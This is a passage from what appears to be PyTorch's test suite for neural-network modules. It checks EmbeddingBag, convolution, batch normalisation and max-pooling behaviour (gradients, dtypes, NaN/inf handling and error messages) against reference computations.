if has_weight and trainable_scale:
self.assertEqual(per_sample_weights.grad, ref_per_sample_weights.grad,
atol=dtype2prec_DONTUSE[dtypes[2]], rtol=0)
trainable_scale = (True, False)
include_last_offset = (True, False)
modes = (('sum', False), ('sum', True), ('max', False), ('mean', False))
for (mode, has_weight), trainable, include_last_offset in itertools.product(
modes, trainable_scale, include_last_offset
):
test_per_sample_weights_new_offsets(
mode, trainable, include_last_offset, has_weight
)
def _test_EmbeddingBag_vs_Embedding(self, N, D, B, L, max_norm=None,
mode='mean',
device='cpu',
wdtype=torch.float,
dtype=torch.long,
test_per_sample_weights=False,
trainable_per_sample_weights=False,
sparse=False,
test_backward=True,
backward_prec=None):
es = nn.EmbeddingBag(N, D, mode=mode, sparse=sparse, max_norm=max_norm).to(device, wdtype)
e = nn.Embedding(N, D, max_norm=max_norm).to(device, wdtype)
e.weight.data.copy_(es.weight)
input = torch.randint(N, (B, L), device=device, dtype=dtype)
offsets = torch.arange(0, B, device=device, dtype=dtype).mul_(L)
grad_output = torch.rand(B, D, device=device, dtype=wdtype)
if test_per_sample_weights:
# To prevent large gradients, weights should sum to 1 for each bag
per_sample_weights = \
torch.randn(B, L, device=device, dtype=wdtype).softmax(dim=-1)
per_sample_weights_reference = \
per_sample_weights.clone().requires_grad_(trainable_per_sample_weights)
per_sample_weights.requires_grad_(trainable_per_sample_weights)
output = es(input.view(-1), offsets, per_sample_weights.view(-1))
else:
output = es(input.view(-1), offsets)
per_sample_weights = None
per_sample_weights_reference = None
if mode == 'sum':
if test_per_sample_weights:
ref_output = (e(input) * per_sample_weights_reference.unsqueeze(-1)).sum(1)
else:
ref_output = e(input).sum(1)
elif mode == 'mean':
assert not test_per_sample_weights
ref_output = e(input).mean(1)
elif mode == 'max':
assert not test_per_sample_weights
ref_output = e(input).max(1)[0]
self.assertEqual(output, ref_output, atol=dtype2prec_DONTUSE[wdtype], rtol=0)
if not test_backward:
return
output.backward(grad_output)
ref_output.backward(grad_output)
es_weight_grad = es.weight.grad.data
if sparse:
es_weight_grad = es.weight.grad.data.to_dense()
# We have more floating point error here because we are dealing with larger numbers
if backward_prec is None:
needed_prec = dtype2prec_DONTUSE[wdtype] * 5
else:
needed_prec = backward_prec
self.assertEqual(es_weight_grad, e.weight.grad, atol=needed_prec, rtol=0)
if test_per_sample_weights and trainable_per_sample_weights:
self.assertEqual(per_sample_weights.grad, per_sample_weights_reference.grad,
atol=dtype2prec_DONTUSE[wdtype], rtol=0)
@skipCUDAIf(True, "Temporarily disabled. See t54369166")
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.half, torch.float, torch.double)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.float, torch.double)))
def test_EmbeddingBag_per_sample_weights_and_no_offsets(self, device, dtypes):
def run_tests(mode, sparse, trainable_per_sample_weights):
kwargs = dict(test_per_sample_weights=True, device=device,
mode=mode, wdtype=dtypes[1], dtype=dtypes[0], sparse=sparse,
trainable_per_sample_weights=trainable_per_sample_weights)
# Simple case
self._test_EmbeddingBag_vs_Embedding(2, 3, 5, 7, **kwargs)
# B * L > 1000
self._test_EmbeddingBag_vs_Embedding(2, 5, 53, 23, **kwargs)
# Large num_embedding
self._test_EmbeddingBag_vs_Embedding(101, 5, 3, 7, **kwargs)
# Large embedding_dim
self._test_EmbeddingBag_vs_Embedding(2, 101, 3, 7, **kwargs)
modes = ('sum',)
sparsity = (True, False)
trainable_scale = (True, False)
for mode, sparse, trainable_per_sample_weights in \
itertools.product(modes, sparsity, trainable_scale):
run_tests(mode, sparse, trainable_per_sample_weights)
# Test CUDA Dense on half precision
if device == 'cuda':
modes = ('sum',)
sparsity = (False,)
trainable_scale = (True, False)
for mode, sparse, trainable_per_sample_weights in \
itertools.product(modes, sparsity, trainable_scale):
run_tests(mode, sparse, trainable_per_sample_weights)
def _test_EmbeddingBag(
self,
device,
mode,
sparse,
wdtype=torch.double,
dtype=torch.long,
odtype=torch.long,
test_backward=True,
):
# check a known test example
es = nn.EmbeddingBag(5, 2, mode=mode, sparse=sparse).to(device, wdtype)
es.weight.data.copy_(torch.arange(1, 11, device=device, dtype=wdtype).view_as(es.weight))
input = torch.tensor([3, 1, 1, 1, 4, 0], device=device, dtype=dtype)
offsets = torch.tensor([0, 0, 3, 3, 6], device=device, dtype=odtype)
grad_output = torch.tensor(
[1, 2,
3, 4], device=device, dtype=wdtype).view(2, 2)
grad_output_with_empty = torch.tensor(
[99, 99,
1, 2,
99, 99,
3, 4,
99, 99], device=device, dtype=wdtype).view(5, 2)
if mode == "sum" or mode == "mean":
denominator = 1 if mode == "sum" else 3
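            # Worked arithmetic for the expected values: with weights
            # arange(1, 11).view(5, 2), the non-empty bags [3, 1, 1] and [1, 4, 0]
            # both sum to [13, 16] ([7+3+3, 8+4+4] and [3+9+1, 4+10+2]), and
            # 'mean' divides by the bag length 3.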
expected_output = torch.tensor(
[[13, 16],
[13, 16]], device=device, dtype=wdtype) / denominator
expected_output_with_empty = torch.tensor(
[[0, 0],
[13, 16],
[0, 0],
[13, 16],
[0, 0]], device=device, dtype=wdtype) / denominator
expected_grad_weight = torch.tensor(
[[3, 4],
[5, 8],
[0, 0],
[1, 2],
[3, 4]], device=device, dtype=wdtype) / denominator
elif mode == "max":
expected_output = torch.tensor(
[[7, 8],
[9, 10]], device=device, dtype=wdtype)
expected_output_with_empty = torch.tensor(
[[0, 0],
[7, 8],
[0, 0],
[9, 10],
[0, 0]], device=device, dtype=wdtype)
expected_grad_weight = torch.tensor(
[[0, 0],
[0, 0],
[0, 0],
[1, 2],
[3, 4]], device=device, dtype=wdtype)
output = es(input, offsets)
output.backward(grad_output_with_empty)
es_weight_grad = es.weight.grad.data
if sparse:
es_weight_grad = es.weight.grad.to_dense()
self.assertEqual(output, expected_output_with_empty)
self.assertEqual(es_weight_grad, expected_grad_weight, atol=dtype2prec_DONTUSE[wdtype], rtol=0)
# check same example except as 2D (2 x 3)
input = input.view(2, -1)
es.zero_grad()
output = es(input)
output.backward(grad_output)
es_weight_grad = es.weight.grad
if sparse:
es_weight_grad = es.weight.grad.to_dense()
self.assertEqual(output, expected_output)
self.assertEqual(es_weight_grad, expected_grad_weight, atol=dtype2prec_DONTUSE[wdtype], rtol=0)
# test all empty bags
es.zero_grad()
inputs = torch.tensor([], dtype=dtype, device=device)
offsets = torch.tensor([0, 0, 0, 0], dtype=odtype, device=device)
es(inputs, offsets).sum().backward()
dense_grad = es.weight.grad
if dense_grad.is_sparse:
dense_grad = dense_grad.to_dense()
self.assertEqual(dense_grad, torch.zeros_like(es.weight))
# now compare EmbeddingBag vs Embedding + Sum/Mean, for constant bag length
N, D, B, L = random.randint(1, 100), random.randint(1, 100), random.randint(1, 50), random.randint(1, 50)
kwargs = dict(mode=mode, sparse=sparse, device=device, wdtype=wdtype, dtype=dtype, test_backward=test_backward)
self._test_EmbeddingBag_vs_Embedding(N, D, B, L, **kwargs)
for max_norm in (None, 3):
for p in itertools.product([1, 2], repeat=4):
self._test_EmbeddingBag_vs_Embedding(*p, max_norm=max_norm, **kwargs)
        # check that giving illegal input combos raises an error
es = nn.EmbeddingBag(10, 20, mode=mode, sparse=sparse)
input = torch.ones(3, 4, dtype=dtype)
offset = torch.arange(0, 3, dtype=odtype)
self.assertRaises(ValueError, lambda: es(input, offset))
self.assertRaises(ValueError, lambda: es(input.view(-1)))
offset[0] = 1
if self.device_type == "cpu":
self.assertRaises(RuntimeError, lambda: es(input.view(-1), offset))
offset[0] = 0
offset[-1] = 100
self.assertRaises(RuntimeError, lambda: es(input.view(-1), offset))
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_embedding_bag_device(self, device, dtypes):
self._test_EmbeddingBag(device, 'sum', False, wdtype=dtypes[2], dtype=dtypes[0], odtype=dtypes[1])
self._test_EmbeddingBag(device, 'mean', False, wdtype=dtypes[2], dtype=dtypes[0], odtype=dtypes[1])
self._test_EmbeddingBag(device, 'max', False, wdtype=dtypes[2], dtype=dtypes[0], odtype=dtypes[1])
test_backward = False
if self.device_type == 'cuda':
# see 'todo' in test_embedding_bag.
test_backward = dtypes[2] is not torch.float16
elif self.device_type == 'cpu':
# TODO: figure out why precision on sparse embeddings isn't the
# same as for dense.
test_backward = dtypes[2] is not torch.float
self._test_EmbeddingBag(
device,
'sum',
True,
wdtype=dtypes[2],
dtype=dtypes[0],
odtype=dtypes[1],
test_backward=test_backward,
)
self._test_EmbeddingBag(
device,
'mean',
True,
wdtype=dtypes[2],
dtype=dtypes[0],
odtype=dtypes[1],
test_backward=test_backward,
)
@dtypesIfCUDA(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double, torch.half)))
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long), (torch.float, torch.double)))
def test_embedding_bag_non_contiguous_weight(self, device, dtypes):
weight_tensor = torch.randn(3, 4, dtype=dtypes[2], device=device)
weight_tensor_non_contig = weight_tensor[:, :3] # This is non-contiguous strided.
weight_tensor_contig = weight_tensor_non_contig.clone().contiguous() # Contig-strided.
index = torch.tensor([0, 1, 2], dtype=dtypes[0], device=device)
offsets = torch.tensor([0, 2], dtype=dtypes[1], device=device)
for mode in ['sum', 'mean', 'max']:
output_non_contig = F.embedding_bag(
input=index,
weight=weight_tensor_non_contig,
offsets=offsets,
mode=mode,
)
output_contig = F.embedding_bag(
input=index,
weight=weight_tensor_contig,
offsets=offsets,
mode=mode,
)
self.assertEqual(output_non_contig, output_contig)
@onlyCUDA
@dtypes(*itertools.product((torch.int, torch.long), (torch.int, torch.long)))
def test_embedding_bag_bfloat16(self, device, dtypes):
self._test_EmbeddingBag(device, 'sum', True, wdtype=torch.bfloat16, dtype=dtypes[0], odtype=dtypes[1], test_backward=True)
self._test_EmbeddingBag(device, 'mean', True, wdtype=torch.bfloat16, dtype=dtypes[0], odtype=dtypes[1], test_backward=True)
@onlyCUDA
@dtypes(torch.half, torch.float, torch.double)
def test_multihead_attention_dtype(self, device, dtype):
embed_dim = 128
num_heads = 8
sl = 10
bs = 8
model = nn.MultiheadAttention(embed_dim, num_heads).cuda().to(dtype)
q = torch.randn(sl, bs, embed_dim, device=device, dtype=dtype)
k = torch.randn(sl, bs, embed_dim, device=device, dtype=dtype)
v = torch.randn(sl, bs, embed_dim, device=device, dtype=dtype)
out = model(q, k, v)
self.assertEqual(q.size(), out[0].size())
self.assertEqual(dtype, out[0].dtype)
@dtypesIfCUDA(*get_all_fp_dtypes(include_bfloat16=AMPERE_OR_ROCM))
@dtypes(torch.float)
def test_Conv2d_naive_groups(self, device, dtype):
        # Check that a grouped convolution matches two half convolutions
m = nn.Conv2d(4, 4, kernel_size=3, groups=2).to(device, dtype)
i = torch.randn(2, 4, 6, 6, device=device, dtype=dtype, requires_grad=True)
output = m(i)
grad_output = torch.randn(2, 4, 4, 4, device=device, dtype=dtype)
output.backward(grad_output)
m1 = nn.Conv2d(2, 2, kernel_size=3).to(device, dtype)
m1.weight.data.copy_(m.weight.data[:2])
m1.bias.data.copy_(m.bias.data[:2])
i1 = i.data[:, :2].contiguous().requires_grad_(True)
output1 = m1(i1)
output1.backward(grad_output[:, :2].contiguous())
m2 = nn.Conv2d(2, 2, kernel_size=3).to(device, dtype)
m2.weight.data.copy_(m.weight.data[2:])
m2.bias.data.copy_(m.bias.data[2:])
i2 = i.data[:, 2:].contiguous().requires_grad_(True)
output2 = m2(i2)
output2.backward(grad_output[:, 2:].contiguous())
self.assertEqual(output, torch.cat([output1, output2], 1))
self.assertEqual(i.grad.data,
torch.cat([i1.grad.data, i2.grad.data], 1),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.bias.grad.data,
torch.cat([m1.bias.grad.data, m2.bias.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
self.assertEqual(m.weight.grad.data,
torch.cat([m1.weight.grad.data, m2.weight.grad.data], 0),
atol=dtype2prec_DONTUSE[dtype], rtol=0)
@dtypes(torch.double)
def test_Conv2d_backward_depthwise(self, device, dtype):
x = torch.randn(2, 2, 4, 20, device=device, dtype=dtype, requires_grad=True)
weight = torch.randn(2, 1, 3, 5, device=device, dtype=dtype, requires_grad=True)
def conv2d_depthwise(x, weight):
return torch.nn.functional.conv2d(
x, weight, bias=None, stride=(1, 10), groups=2)
for cudnn_enabled in [False, True]:
with torch.backends.cudnn.flags(enabled=cudnn_enabled):
torch.autograd.gradcheck(conv2d_depthwise, (x, weight))
def _test_batchnorm_grad(self, device, dtype=torch.double):
bs, n_feat, size_feat = 4, 5, 6
input = torch.arange(bs * n_feat * size_feat, device=device,
requires_grad=True, dtype=dtype).view(bs, n_feat, size_feat)
weight = torch.arange(1, n_feat + 1, device=device, requires_grad=True, dtype=dtype)
bias = torch.arange(n_feat, device=device, requires_grad=True, dtype=dtype)
running_mean = 1 - torch.arange(n_feat, device=device, dtype=dtype)
running_var = 2 * torch.arange(n_feat, device=device, dtype=dtype)
for training in [False, True]:
_assertGradAndGradgradChecks(self, F.batch_norm, (input, running_mean, running_var, weight, bias,
training, 0.1, 0.0001))
def test_batchnorm_grad(self, device):
self._test_batchnorm_grad(device)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_grad(device)
def test_hardsigmoid_grad(self, device):
inputs = (torch.randn(4, 16, 16, device=device) - 0.5) * 10
inputs.requires_grad = True
self.assertTrue(gradcheck(F.hardsigmoid, (inputs,)))
# currently fails on XLA
@onlyOnCPUAndCUDA
def test_hardswish_grad(self, device):
inputs = (torch.randn(4, 16, 16, device=device) - 0.5) * 10
inputs.requires_grad = True
self.assertTrue(gradcheck(F.hardswish, (inputs,)))
def _test_batchnorm_eval(self, ndim, device, dtype, module_dtype=None):
module_dtype = module_dtype or dtype
module = nn.BatchNorm1d(3).to(device, module_dtype)
module.eval()
data = torch.rand([3] * ndim, device=device, dtype=dtype, requires_grad=True)
grad = torch.rand([3] * ndim, device=device, dtype=dtype)
# 1st pass
res1 = module(data)
res1.backward(grad)
grad1 = data.grad.clone()
# 2nd pass
if data.grad is not None:
data.grad.data.zero_()
res2 = module(data)
res2.backward(grad)
grad2 = data.grad.clone()
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
# track_running_stats=False
module = nn.BatchNorm1d(3, track_running_stats=False).to(device, module_dtype)
data = torch.rand(4, 3, device=device, dtype=dtype, requires_grad=True)
grad = torch.rand(4, 3, device=device, dtype=dtype)
# 1st pass
res1 = module(data)
res1.backward(grad)
grad1 = data.grad.clone()
# set eval
module.eval()
# 2nd pass
if data.grad is not None:
data.grad.data.zero_()
res2 = module(data)
res2.backward(grad)
grad2 = data.grad.clone()
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.bfloat16)
def test_batchnorm_eval(self, device, dtype):
self._test_batchnorm_eval(2, device, dtype)
self._test_batchnorm_eval(3, device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_eval(2, device, dtype)
self._test_batchnorm_eval(3, device, dtype)
@onlyCUDA
@dtypes(torch.bfloat16, torch.half)
def test_batchnorm_eval_mixed(self, device, dtype):
# Test bfloat16 input with float module
self._test_batchnorm_eval(2, device, dtype, torch.float)
self._test_batchnorm_eval(3, device, dtype, torch.float)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_eval(2, device, dtype, torch.float)
self._test_batchnorm_eval(3, device, dtype, torch.float)
def _test_batchnorm_affine(self, ndim, device, dtype, module_dtype=None):
# Compare affine against no-op weights and bias
module_dtype = module_dtype or dtype
module = nn.BatchNorm1d(3, affine=False).to(device, module_dtype)
module_affine = nn.BatchNorm1d(3, affine=True).to(device, module_dtype)
with torch.no_grad():
module_affine.weight.fill_(1.0)
module_affine.bias.zero_()
data = torch.rand([3] * ndim, device=device, dtype=dtype, requires_grad=True)
grad = torch.ones_like(data, requires_grad=False)
# With weights all ones and bias all zeros
res1 = module_affine(data)
res1.backward(grad)
grad1 = data.grad.clone()
data.grad.zero_()
# Without any weights or bias
res2 = module(data)
res2.backward(grad)
grad2 = data.grad
self.assertEqual(res1, res2)
self.assertEqual(grad1, grad2)
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.bfloat16)
def test_batchnorm_affine(self, device, dtype):
self._test_batchnorm_affine(2, device, dtype)
self._test_batchnorm_affine(3, device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_affine(2, device, dtype)
self._test_batchnorm_affine(3, device, dtype)
@onlyCUDA
@dtypes(torch.bfloat16, torch.half)
def test_batchnorm_affine_mixed(self, device, dtype):
cudnn_enabled = [False]
if self.device_type == 'cuda' and self.has_cudnn():
# TODO: Test fails with cudnn, see gh-62034
# cudnn_enabled = [False, True]
pass
# Test bfloat16 input with float module
for enabled in cudnn_enabled:
with torch.backends.cudnn.flags(enabled=enabled):
self._test_batchnorm_affine(2, device, dtype, torch.float)
self._test_batchnorm_affine(3, device, dtype, torch.float)
def _test_batchnorm_simple_average(self, device, dtype, module_dtype=None):
module_dtype = module_dtype or dtype
module = nn.BatchNorm1d(3, momentum=None).to(dtype=module_dtype, device=device)
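        # momentum=None selects a cumulative moving average: the running stats
        # are the plain mean over all batches seen, which is what lets the
        # combined pass below reproduce (stats1 + stats2) / 2 exactly.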
zeros = torch.zeros(3, dtype=module_dtype, device=device)
ones = torch.ones(3, dtype=module_dtype, device=device)
self.assertEqual(module.running_mean, zeros)
self.assertEqual(module.running_var, ones)
data1 = torch.rand(4, 3, dtype=dtype, device=device)
data2 = torch.rand(4, 3, dtype=dtype, device=device)
# 1st pass
res1 = module(data1)
running_mean1 = module.running_mean.clone()
running_var1 = module.running_var.clone()
self.assertNotEqual(running_mean1, zeros)
self.assertNotEqual(running_var1, ones)
# reset stats
module.reset_running_stats()
self.assertEqual(module.running_mean, zeros)
self.assertEqual(module.running_var, ones)
# 2nd pass
res2 = module(data2)
running_mean2 = module.running_mean.clone()
running_var2 = module.running_var.clone()
self.assertNotEqual(running_mean2, zeros)
self.assertNotEqual(running_var2, ones)
# reset stats
module.reset_running_stats()
self.assertEqual(module.running_mean, zeros)
self.assertEqual(module.running_var, ones)
# 3rd (combined) pass
res3 = module(data1)
res4 = module(data2)
self.assertEqual(res3, res1)
self.assertEqual(res4, res2)
self.assertEqual(module.running_mean, (running_mean1 + running_mean2) / 2)
self.assertEqual(module.running_var, (running_var1 + running_var2) / 2)
@dtypes(torch.float)
@dtypesIfCUDA(torch.float, torch.bfloat16)
def test_batchnorm_simple_average(self, device, dtype):
self._test_batchnorm_simple_average(device, dtype)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_simple_average(device, dtype)
@onlyCUDA
@dtypes(torch.bfloat16, torch.half)
def test_batchnorm_simple_average_mixed(self, device, dtype):
self._test_batchnorm_simple_average(device, dtype, torch.float)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_batchnorm_simple_average(device, dtype, torch.float)
def _test_maxpool_indices(self, num_dim, adaptive=False, device="cpu", dtype=torch.float):
def expected_indices(dim):
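            # For input values 1..numel laid out row-major, the maximum of each
            # size-2 pooling window is its last element, e.g. flattened positions
            # 5, 7, 13, 15 within a 4x4 plane.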
if dim == 1:
return torch.tensor([1, 3], dtype=torch.double).repeat(2, 2, 1)
if dim == 2:
return torch.tensor([[5, 7], [13, 15]], dtype=torch.double).repeat(2, 2, 1, 1)
def expected_grad(dim):
if dim == 1:
return torch.tensor([0, 1, 0, 1], dtype=torch.double).repeat(2, 2, 1)
grad = expected_grad(dim - 1)
zero = torch.zeros(grad.size())
return torch.stack((zero, grad, zero, grad), 2)
def expected_output(dim):
if dim == 1:
return torch.arange(2, 17, 2).view(2, 2, 2)
if dim == 2:
col = torch.arange(6, 63, 8)
return torch.stack([col, col + 2], 1).view(2, 2, 2, 2)
if adaptive:
cls_name = 'AdaptiveMaxPool{}d'.format(num_dim)
else:
cls_name = 'MaxPool{}d'.format(num_dim)
module_cls = getattr(nn, cls_name)
module = module_cls(2, return_indices=True).to(device, dtype=dtype)
numel = 4 ** (num_dim + 1)
input = torch.arange(1, numel + 1).view(2, 2, *repeat(4, num_dim)).to(device, dtype=dtype)
input_var = input.clone().detach().requires_grad_()
# Check forward
output, indices = module(input_var)
if num_dim != 3:
expected_indices = expected_indices(num_dim)
expected_output = expected_output(num_dim)
self.assertEqual(indices.dim(), input.dim())
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(indices.data.squeeze(), expected_indices)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(output.data.squeeze(), expected_output)
self.assertTrue(output.requires_grad)
self.assertFalse(indices.requires_grad)
# Make sure backward works
grad_output = torch.ones(output.size(), device=device, dtype=dtype)
output.backward(grad_output, retain_graph=True)
expected_grad = expected_grad(num_dim)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(input_var.grad.data, expected_grad.view_as(input))
        # Make sure that backward after changing the indices results in an error
indices.add_(1)
self.assertRaises(RuntimeError, lambda: output.backward(grad_output))
# Make sure -Infinity is handled correctly
t = torch.tensor([[[float("-inf")]]])
m = nn.MaxPool1d(kernel_size=1, return_indices=True)
output, indices = m(t)
self.assertEqual(output[0, 0, 0], float("-inf"))
self.assertEqual(indices[0, 0, 0], 0)
t = torch.tensor([[[float("-inf")]]])
m = nn.MaxPool2d(kernel_size=1, return_indices=True)
output, indices = m(t)
self.assertEqual(output[0, 0, 0], float("-inf"))
self.assertEqual(indices[0, 0, 0], 0)
t = torch.tensor([[[[float("-inf")]]]])
m = nn.MaxPool3d(kernel_size=1, return_indices=True)
output, indices = m(t)
self.assertEqual(output[0, 0, 0, 0], float("-inf"))
self.assertEqual(indices[0, 0, 0, 0], 0)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_MaxPool1d_indices(self, device, dtype):
self._test_maxpool_indices(1, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_MaxPool2d_indices(self, device, dtype):
self._test_maxpool_indices(2, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_MaxPool3d_indices(self, device, dtype):
self._test_maxpool_indices(3, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_AdaptiveMaxPool1d_indices(self, device, dtype):
self._test_maxpool_indices(1, adaptive=True, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_AdaptiveMaxPool2d_indices(self, device, dtype):
self._test_maxpool_indices(2, adaptive=True, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_AdaptiveMaxPool3d_indices(self, device, dtype):
self._test_maxpool_indices(3, adaptive=True, device=device, dtype=dtype)
@dtypesIfCUDA(*get_all_fp_dtypes())
@dtypes(torch.float)
def test_maxpool_indices_no_batch_dim(self, device, dtype):
"""Check that indices with no batch dim is consistent with a single batch."""
max_pool_cases = [
(nn.MaxPool1d(3, return_indices=True),
torch.randn(3, 5, device=device, dtype=dtype)),
(nn.MaxPool2d(3, return_indices=True),
torch.randn(3, 5, 6, device=device, dtype=dtype)),
(nn.MaxPool3d(3, return_indices=True),
torch.randn(3, 5, 6, 7, device=device, dtype=dtype)),
(nn.AdaptiveMaxPool1d(3, return_indices=True),
torch.randn(3, 5, device=device, dtype=dtype)),
(nn.AdaptiveMaxPool2d(3, return_indices=True),
torch.randn(3, 5, 6, device=device, dtype=dtype)),
(nn.AdaptiveMaxPool3d(3, return_indices=True),
torch.randn(3, 5, 6, 7, device=device, dtype=dtype))]
for module, input in max_pool_cases:
_, indices_no_batch = module(input)
            _, indices_single_batch = module(input.unsqueeze(0))
            self.assertEqual(indices_no_batch, indices_single_batch.squeeze(0))
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float)
@onlyOnCPUAndCUDA # TODO: Fails on XLA
def test_max_pool_nan_inf(self, device, dtype):
for adaptive in ['', 'adaptive_']:
for num_dim in [1, 2, 3]:
fn_name = '{}max_pool{}d'.format(adaptive, num_dim)
fn = getattr(F, fn_name)
x = torch.full([1, 1] + num_dim * [3], nan, device=device, dtype=dtype, requires_grad=True)
res = fn(x, 1 if adaptive else 3)
res.backward(torch.randn_like(res))
self.assertTrue(math.isnan(res.item()))
x.requires_grad_(False)
res = fn(x, 1 if adaptive else 3)
self.assertTrue(math.isnan(res.item()))
x2 = torch.full([1, 1] + num_dim * [3], -inf, device=device, dtype=dtype, requires_grad=True)
res2 = fn(x2, 1 if adaptive else 3)
res2.backward(torch.randn_like(res2))
self.assertTrue(math.isinf(res2.item()))
x2.requires_grad_(False)
res2 = fn(x2, 1 if adaptive else 3)
self.assertTrue(math.isinf(res2.item()))
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
def test_grid_sample_nan_inf(self, device, dtype):
input = torch.zeros([1, 1, 3, 3], device=device, dtype=dtype)
grid = torch.tensor([[[[nan, 0], [0, inf]]]], device=device, dtype=dtype)
for padding_mode in ('reflection', 'border', 'zeros'):
sample = torch.nn.functional.grid_sample(input=input, grid=grid, mode='nearest',
padding_mode=padding_mode, align_corners=False)
self.assertEqual(sample, torch.zeros([1, 1, 1, 2], device=device, dtype=dtype))
@onlyOnCPUAndCUDA
def test_fractional_max_pool2d(self, device):
x = torch.randn(1, 2, 7, 7, requires_grad=True, device=device)
samples = x.new(1, 2, 2).uniform_()
def func(x):
return F.fractional_max_pool2d(
x, (2, 2), output_size=(3, 3), _random_samples=samples)
self.assertEqual(func(x).shape, (1, 2, 3, 3))
gradcheck(func, [x])
gradgradcheck(func, [x])
x = torch.randn(2, 7, 7, requires_grad=True, device=device)
self.assertEqual(func(x).shape, (2, 3, 3))
if self.device_type != 'cuda':
# Reference: https://github.com/pytorch/pytorch/issues/52427
# Raises -> RuntimeError: TensorAccessor expected 4 dims but tensor has 3
# on CUDA in gradcheck
gradcheck(func, [x])
gradgradcheck(func, [x])
for kernel_size in [(), (1,)]:
with self.assertRaisesRegex(RuntimeError, "kernel_size must either"):
# Incorrect kernel_size
F.fractional_max_pool2d(x, kernel_size=kernel_size, output_size=(3, 3), _random_samples=samples)
err_large_msg = "too large relative to input "
err_out_size_msg = "output_size must either"
for output_size, msg in [((9, 3), err_large_msg + "height"),
((3, 9), err_large_msg + "width"),
((3,), err_out_size_msg),
((), err_out_size_msg)]:
with self.assertRaisesRegex(RuntimeError, msg):
# Incorrect output_size
F.fractional_max_pool2d(x, (2, 2), output_size=output_size, _random_samples=samples)
@onlyOnCPUAndCUDA
def test_fractional_max_pool3d(self, device):
x = torch.randn(1, 2, 7, 7, 7, requires_grad=True, device=device)
samples = x.new(1, 2, 3).uniform_()
def func(x):
return F.fractional_max_pool3d(
x, (2, 2, 2), output_size=(3, 3, 3), _random_samples=samples)
self.assertEqual(func(x).shape, (1, 2, 3, 3, 3))
gradcheck(func, [x])
gradgradcheck(func, [x])
x = torch.randn(2, 7, 7, 7, requires_grad=True, device=device)
self.assertEqual(func(x).shape, (2, 3, 3, 3))
gradcheck(func, [x])
gradgradcheck(func, [x])
for kernel_size in [(), (1,), (1, 1)]:
with self.assertRaisesRegex(RuntimeError, "kernel_size must either"):
# Incorrect kernel_size
F.fractional_max_pool3d(x, kernel_size=kernel_size, output_size=(3, 3, 3), _random_samples=samples)
err_large_msg = "too large relative to input "
err_out_size_msg = "output_size must either"
for output_size, msg in [((9, 3, 3), err_large_msg + "time"),
((3, 9, 3), err_large_msg + "height"),
((3, 3, 9), err_large_msg + "width"),
((3, 3), err_out_size_msg),
((3,), err_out_size_msg),
((), err_out_size_msg)]:
with self.assertRaisesRegex(RuntimeError, msg):
# Incorrect output_size
F.fractional_max_pool3d(x, (2, 2, 2), output_size=output_size, _random_samples=samples)
@dtypesIfCUDA(torch.half, torch.float, torch.double)
@dtypes(torch.float)
@onlyOnCPUAndCUDA # TODO: Fails on XLA
def test_fractional_max_pool_nan_inf(self, device, dtype):
for num_dim in [2, 3]:
fn_name = 'FractionalMaxPool{}d'.format(num_dim)
fn = getattr(nn, fn_name)(kernel_size=2, output_size=1)
x = torch.full([1, 1] + num_dim * [3], nan, device=device, dtype=dtype, requires_grad=True)
res = fn(x)
res.backward(torch.randn_like(res))
self.assertTrue(math.isnan(res.item()))
x2 = torch.full([1, 1] + num_dim * [3], -inf, device=device, dtype=dtype, requires_grad=True)
res2 = fn(x2)
res2.backward(torch.randn_like(res2))
self.assertTrue(math.isinf(res2.item()))
@onlyOnCPUAndCUDA # TODO: RuntimeError message different on XLA
def test_pooling_zero_stride(self, device):
for op in ('max', 'avg'):
for num_dim in [1, 2, 3]:
fn_name = '{}_pool{}d'.format(op, num_dim)
fn = getattr(F, fn_name)
x = torch.ones([1, 2] + num_dim * [4], device=device, dtype=torch.float)
self.assertRaisesRegex(RuntimeError, r"stride should not be zero|stride must be greater than zero",
lambda: fn(x, kernel_size=2, stride=0))
fn_module_name = '{}Pool{}d'.format(op.title(), num_dim)
fn_module = getattr(nn, fn_module_name)(kernel_size=2, stride=0)
self.assertRaisesRegex(RuntimeError, r"stride should not be zero|stride must be greater than zero",
lambda: fn_module(x))
